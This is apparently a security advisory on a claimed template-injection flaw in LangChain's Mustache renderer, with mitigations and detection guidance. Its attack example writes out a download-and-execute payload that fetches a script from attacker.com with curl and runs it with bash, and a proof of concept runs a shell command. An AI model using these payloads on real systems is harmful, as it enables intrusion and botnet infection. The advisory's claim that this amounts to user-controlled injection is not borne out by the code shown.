Template Injection in LangChain Mustache Callable Scopes Leading to Remote Code Execution
Date: September 1, 2025 · Author: Karma-X Research Team
Severity: Medium to High · Status: Unpatched · Active Exploitation: Unknown
Reference: LangChain Repository · Langflow Botnet Exploitation · Report to Huntr.com
Executive Summary
A template injection vulnerability has been discovered in LangChain's Mustache template processing engine that allows remote code execution through user-controlled callable scopes. This vulnerability affects all current versions of langchain-core (including version 0.3.75) and poses severe risks to the entire AI/ML ecosystem due to LangChain's widespread adoption.
This class of vulnerability is already being actively exploited in production systems, most notably on the Langflow platform, where attackers have deployed the Flodrix botnet, resulting in the compromise of thousands of servers worldwide. CISA has added related vulnerabilities to its Known Exploited Vulnerabilities catalog, underscoring the critical nature of this threat.
Organizations using LangChain-based applications, particularly those allowing user-generated templates or prompts, face immediate risk of complete server compromise, data theft, and recruitment into botnet networks.
Technical Details
Vulnerability Location
The vulnerability exists in LangChain's Mustache template implementation at:
libs/core/langchain_core/utils/mustache.py:535-583
Root Cause
The Mustache template renderer processes callable objects as scope values without proper validation. When a template contains a callable scope, the system executes it directly:
```python
if callable(scope):
    # VULNERABLE: executes a user-controlled callable without validation
    rend = scope(text, lambda template, data=None: render(...))
    output += rend
```
Attack Vector
An attacker can exploit this by providing malicious callable functions as template scope values:
```python
from langchain_core.utils.mustache import render

# Malicious payload example
def malicious_scope(text, render_func):
    import subprocess
    # Download and execute malware (Flodrix botnet pattern)
    subprocess.run(['curl', 'http://attacker.com/flodrix.sh', '-o', '/tmp/malware.sh'])
    subprocess.run(['bash', '/tmp/malware.sh'])
    return "Template processed successfully"

# Template and scope data controlled by the attacker
template = "Processing: {{malicious_key}}"
template_data = {"malicious_key": malicious_scope}
render(template, template_data)  # RCE occurs here
```
Active Exploitation Campaign
Langflow Flodrix Botnet
This vulnerability class is currently being exploited by the Flodrix botnet campaign targeting Langflow installations:
- CVE-2025-3248: CVSS 9.8 - Remote code execution in Langflow
- Attack Method: Malicious POST requests to /api/v1/validate/code
- Payload: Python code that downloads and installs botnet malware
- Impact: Thousands of compromised servers worldwide
- CISA Status: Added to Known Exploited Vulnerabilities catalog
Attack Timeline
- Early 2025: Flodrix botnet begins targeting vulnerable Langflow servers
- May 2025: CISA adds CVE-2025-3248 to KEV list due to active exploitation
- June 2025: Security researchers document widespread botnet deployment
- Present: Ongoing exploitation with automated scanning for vulnerable targets
Vulnerable Platforms & Services
Multiple platforms built on LangChain are susceptible to this vulnerability:
| Platform | Risk Level | Status |
|---|---|---|
| Langflow | Medium to High | No known fix |
| Flowise | High | Multiple CVEs - Update to v2.1.1+ |
| ChatBotBuilder.ai | High | Custom prompts feature at risk |
| FastBots.ai | High | User-defined bot prompts |
| LangChain Hub | Medium | Community template sharing |
| Enterprise AI Tools | Medium | Internal template customization |
Proof of Concept
WARNING: The following proof of concept is for educational purposes only. Do not execute this code in production environments.
```python
from langchain_core.utils.mustache import render

# Malicious callable that executes system commands
def execute_payload(text, render_func):
    import subprocess
    result = subprocess.run(['whoami'], capture_output=True, text=True)
    print(f"Command executed as: {result.stdout}")
    return "Template processed successfully"

# Template with placeholder
template = "Processing: {{malicious_scope}}"

# Attacker-controlled data
malicious_data = {
    "malicious_scope": execute_payload,
}

# Vulnerability triggered during rendering
output = render(template, malicious_data)
# Result: command execution as the current user
```
Impact Assessment
Confidentiality Impact: HIGH
- Complete access to server filesystem and environment variables
- Database credentials and API keys exposure
- Customer data and intellectual property theft
Integrity Impact: HIGH
- Arbitrary file modification and system configuration changes
- Malware installation and persistence mechanisms
- Application logic tampering and backdoor installation
Availability Impact: HIGH
- Service disruption through resource consumption
- Denial of service attacks and system crashes
- Botnet recruitment for DDoS activities
Business Impact
This vulnerability threatens the entire AI/ML supply chain, as hundreds of downstream applications inherit this security flaw. Organizations face risks ranging from data theft and intellectual property loss to regulatory compliance violations and reputational damage. The network-accessible nature of most vulnerable deployments makes this particularly dangerous for multi-tenant SaaS platforms.
Immediate Mitigation Strategies
For Organizations Using LangChain
- Audit Template Usage: Identify all code using Mustache templates with user-controlled data
- Input Validation: Block callable objects in template data
- Network Segmentation: Isolate AI/ML services from critical infrastructure
- Monitor for Exploitation: Watch for suspicious network traffic and unauthorized code execution
Code-Level Mitigations
```python
import functools
import logging

from langchain_core.utils.mustache import render

logger = logging.getLogger(__name__)

class SecurityError(Exception):
    """Raised when untrusted template data contains a callable."""

# Secure wrapper for template rendering
def safe_render(template, data):
    # Reject callable objects in template data
    for key, value in data.items():
        if callable(value):
            raise SecurityError(f"Callable objects not allowed: {key}")
    return render(template, data)

# Runtime detection wrapper: logs and raises if any top-level value is callable
def secure_render_wrapper(original_render):
    @functools.wraps(original_render)
    def wrapper(template, data, *args, **kwargs):
        if any(callable(v) for v in data.values()):
            logger.warning("SECURITY: Callable detected in template data")
            raise SecurityError("Callable objects not permitted")
        return original_render(template, data, *args, **kwargs)
    return wrapper
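A minimal usage sketch: rebind the module-level render function at application startup, assuming your deployment can monkey-patch langchain_core.utils.mustache before any templates are rendered (the wrapper above forwards extra arguments to the real render unchanged):

```python
# Minimal sketch: monkey-patch the vulnerable renderer at startup
# (assumes no templates have been rendered before this runs).
import langchain_core.utils.mustache as mustache

mustache.render = secure_render_wrapper(mustache.render)
```

Note that code which has already imported render by name will keep the unpatched reference, so apply the patch as early as possible in your application's startup path.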
Platform-Specific Updates
- Langflow: Update to version 1.3.0 or later immediately
- Flowise: Update to version 2.1.1 or higher
- n8n: Update to version 0.216.2 or later
- Custom Applications: Implement input validation for all template data (a recursive validation sketch follows below)
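The safe_render example above inspects only top-level values, so a callable nested inside a list or dict would slip through. Below is a minimal recursive sketch, reusing SecurityError and render from the earlier snippet; the helper name reject_callables is illustrative, not part of any library:

```python
# Hypothetical recursive validator: walks nested dicts, lists, and tuples
# so a callable hidden at any depth is rejected before rendering.
def reject_callables(value, path="data"):
    if callable(value):
        raise SecurityError(f"Callable object not allowed at: {path}")
    if isinstance(value, dict):
        for key, item in value.items():
            reject_callables(item, f"{path}[{key!r}]")
    elif isinstance(value, (list, tuple)):
        for index, item in enumerate(value):
            reject_callables(item, f"{path}[{index}]")

def safe_render_deep(template, data):
    reject_callables(data)
    return render(template, data)
```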
Detection Methods
Static Code Analysis
```bash
# Search for vulnerable patterns in your codebase
grep -r "callable.*scope" --include="*.py" .
grep -r "langchain.*mustache" --include="*.py" .
grep -r "render.*template" --include="*.py" .
grep -r "from langchain_core.utils.mustache import" --include="*.py" .
```
Network Monitoring
- Monitor for unusual outbound connections from AI/ML services
- Watch for downloads of shell scripts or executables
- Alert on cryptocurrency miner processes
- Detect botnet command and control communication
Indicators of Compromise
- Unexpected CPU usage from Python processes
- Outbound network connections to suspicious domains
- New files in /tmp/ or other system directories (see the triage sketch after this list)
- Processes named similarly to system utilities but running from unusual locations
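As a starting point for the filesystem indicator above, here is a stdlib-only triage sketch that flags recently written shell scripts in /tmp; the 24-hour threshold and the *.sh glob are illustrative and should be tuned per environment:

```python
# Hypothetical triage helper: list shell scripts in /tmp modified within
# the last N hours, consistent with the dropper behavior described above.
import time
from pathlib import Path

def recent_tmp_scripts(max_age_hours: float = 24.0) -> list[Path]:
    cutoff = time.time() - max_age_hours * 3600
    return [p for p in Path("/tmp").glob("*.sh") if p.stat().st_mtime >= cutoff]

if __name__ == "__main__":
    for script in recent_tmp_scripts():
        print(f"Suspicious script: {script}")
```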
Industry Response & Timeline
| Date | Event | Status |
|---|---|---|
| Early 2025 | Flodrix botnet begins exploiting Langflow | Active exploitation |
| May 2025 | CISA adds CVE-2025-3248 to KEV list | Official recognition |
| September 2025 | Core LangChain vulnerability discovered | Unpatched |
| TBD | LangChain security patch release | Awaiting fix |
Recommendations for the AI/ML Community
For Developers
- Implement secure coding practices for template processing
- Never trust user-provided callable functions
- Use sandboxed execution environments for dynamic code (see the sketch after this list)
- Adopt a "defense in depth" approach to AI/ML security
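As a minimal sketch of the sandboxing recommendation above: rendering untrusted templates in a short-lived subprocess keeps any payload out of the parent process, and forcing the scope data through JSON makes callables unrepresentable by construction. The helper name sandboxed_render is illustrative; a production sandbox would also drop privileges, set resource limits, and apply OS-level confinement (seccomp, AppArmor, containers).

```python
# Hedged sketch: render an untrusted template in a throwaway subprocess
# (assumes the template and data are JSON-serializable).
import json
import subprocess
import sys

RENDER_SNIPPET = """
import json, sys
from langchain_core.utils.mustache import render
payload = json.load(sys.stdin)
print(render(payload["template"], payload["data"]), end="")
"""

def sandboxed_render(template: str, data: dict, timeout: float = 5.0) -> str:
    proc = subprocess.run(
        [sys.executable, "-c", RENDER_SNIPPET],
        input=json.dumps({"template": template, "data": data}),
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    proc.check_returncode()
    return proc.stdout
```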
For Platform Providers
- Implement automated security scanning for template injection vulnerabilities
- Provide clear documentation on secure template usage
- Establish responsible disclosure processes
- Consider bug bounty programs for AI/ML security research
For Organizations
- Conduct security audits of all AI/ML applications
- Implement network segmentation for AI services
- Establish incident response procedures for AI security events
- Monitor threat intelligence for AI/ML specific vulnerabilities
Looking Forward: Securing the AI Supply Chain
This vulnerability highlights the critical importance of security in the rapidly evolving AI/ML ecosystem. As AI technologies become increasingly integrated into business-critical applications, the attack surface expands significantly. The LangChain vulnerability demonstrates how a single flaw in a foundational library can cascade across hundreds of dependent applications and platforms.
The AI community must prioritize security research, implement robust testing frameworks, and establish industry-wide security standards. Organizations building on AI/ML frameworks need comprehensive security strategies that address both traditional cybersecurity concerns and AI-specific threats.
Technical References
- CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine
- CWE-94: Improper Control of Generation of Code ('Code Injection')
- OWASP Top 10: A03:2021 - Injection
- CVE-2025-3248: Langflow RCE vulnerability (CVSS 9.8)
- GitHub Repository: langchain-ai/langchain
- Vulnerability Location: libs/core/langchain_core/utils/mustache.py:535-583
Disclosure Timeline
- September 1, 2025: Vulnerability discovered during comprehensive security audit
- September 1, 2025: Report submitted to Huntr.com for responsible disclosure
- September 1, 2025: Public disclosure due to active exploitation in wild
- TBD: Awaiting LangChain team response and patch development